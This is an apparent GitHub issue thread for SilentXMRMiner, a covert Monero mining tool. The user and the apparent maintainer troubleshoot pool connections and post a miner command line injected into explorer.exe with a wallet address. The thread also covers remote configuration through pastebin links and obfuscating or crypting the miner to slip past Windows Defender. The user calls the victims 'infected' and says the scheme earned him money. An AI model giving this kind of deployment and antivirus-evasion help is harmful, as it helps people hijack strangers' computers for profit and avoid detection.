### ISSUE TITLE
Why Not working?

### ISSUE THREAD

**Issue by Anox208** [UnamSanctam/SilentXMRMiner#392]
yea This was working fine I took a break and now come back and this is just not working I am frustrated and It's 4 am in the morning so can't give u much details but not only the newest but also the older ones seems like not working. I used both nano pool and xmrpool.eu and seems like nothing works idk what is the issue is and I am certain it's not the pool address:port or the monero address.bye going to sleep see u all tommorw?maybe

**Comment by Anox208** [comment]
well maybe there is something wrong with https://web.xmrpool.eu/ ???
idk the older ones work perfectly here

**Comment by UnamSanctam** [comment]
Yes that works, I'm mining there right now. Can you try running [MinerCheck3.zip](https://github.com/UnamSanctam/SilentXMRMiner/files/6978856/MinerCheck3.zip) and post what it returns?

**Comment by Anox208** [comment]
Not run as Administrator, only non-administrator miners can be searched for.
Miners:
C:\Windows\explorer.exe  --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr  --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmrpool.eu:9999 --user=4AvnUUYcJsoFrbP94GHTTSYRR5MAyMRM5QNoWQE8N2zRcc3tnTzcUoV7E9HeoiMZD3RSapGo2npNRBvHaZpTApG3GkoujPa --pass= --cpu-max-threads-hint=50   --cinit-idle-wait=1 --cinit-idle-cpu=80
GPUs:
 VirtualBox VESA BIOS VirtualBox Graphics Adapter (WDDM)
Compatible GPU found: False

**Comment by Anox208** [comment]
Keep in mind I use the old version cause the latest doesn't work for me at all. Do u need a restart for the latest to work? Also I don't want to use nanopool but it seems the nano pool one kinda works.

**Comment by UnamSanctam** [comment]
No, both the old version and the new version use the same miner if you have "Online Download" enabled. But you're using an SSL port 9999 so you should enable SSL/TLS or it can't connect.

**Comment by Anox208** [comment]
ok but what if i use port 5555? do I still need to enable ssl?

**Comment by UnamSanctam** [comment]
No since port 5555 is a normal stratum port.

**Comment by Anox208** [comment]
I am going to wait a few hour and let's see if the hash rate shows up in web.xmrpool.eu. Coz the new one didn't.
ok.

**Comment by UnamSanctam** [comment]
Though it's better to use SSL, so use port 9999 and enable "SSL/TLS" in the "Mining" tab.

**Comment by Anox208** [comment]
ok
I will wait for a  few hour to see if the miner shows up on the pool and tell u about the result. The nanopool ones seems to be working

**Comment by Anox208** [comment]
> Though it's better to use SSL, so use port 9999 and enable "SSL/TLS" in the "Mining" tab.

ok so everything works fine. However I had a few more questions for the latest miner. what are the best settings? How to configure remotely?? Also if infected opens the miner(not miner builder) 2 or 3 times does it make the miner stop sending hash/s on the pool. Coz I opened it 2ce and it wasn't sending anything so i had to uninstall and open it once.

**Comment by UnamSanctam** [comment]
Best settings depends on what you want it to do and how stealthily you want it. You can read through the wiki: https://github.com/UnamSanctam/SilentXMRMiner/wiki if you want more information on each option. To configure it remotely you just upload the JSON settings here: https://github.com/UnamSanctam/SilentXMRMiner/wiki#remote-configuration to some site like rentry or pastebin and then get the 'raw' URL from the site (there's a button after you've created a paste), then you just put that link into the 'Remote Configuration' field.

Opening the miner multiple times is fine, it will just not inject the second miner (or any more), you could start the miner a thousand times and it should still be fine (I regularly spam open it during my testing to see if there is anything wrong).

**Comment by Anox208** [comment]
yo The Windows defender deletes the miner instantly is there any way to get around it? any way to not get detected by windows defender?

**Comment by UnamSanctam** [comment]
You'd have to obfuscate/crypt it, it used to be undetected until about a week ago (was undetected due to the new update) but since the project is public and open source it inevitably gets detected. I am also working on a new update (like always) that hopefully reduces detections, Windows Defender has been getting a lot stricter lately which makes it a lot harder.

**Comment by Anox208** [comment]
I don't understand why made this free. You probably could have earned a lot of money if u sold it for money. Not many people have the skills u have.

**Comment by UnamSanctam** [comment]
Well, I already get enough money from work, this is mainly just a passion project that I can work on for fun and to get away from work and to be able to choose what I program instead of work where I have to program whatever project I'm on.

**Comment by Anox208** [comment]
well no money is enough money. I guess it's great that this project is free. I made a few bucks with it and bought a few steam games so I guess I am thankful. Thanks for everything bro. Keep up the great work if u want to.
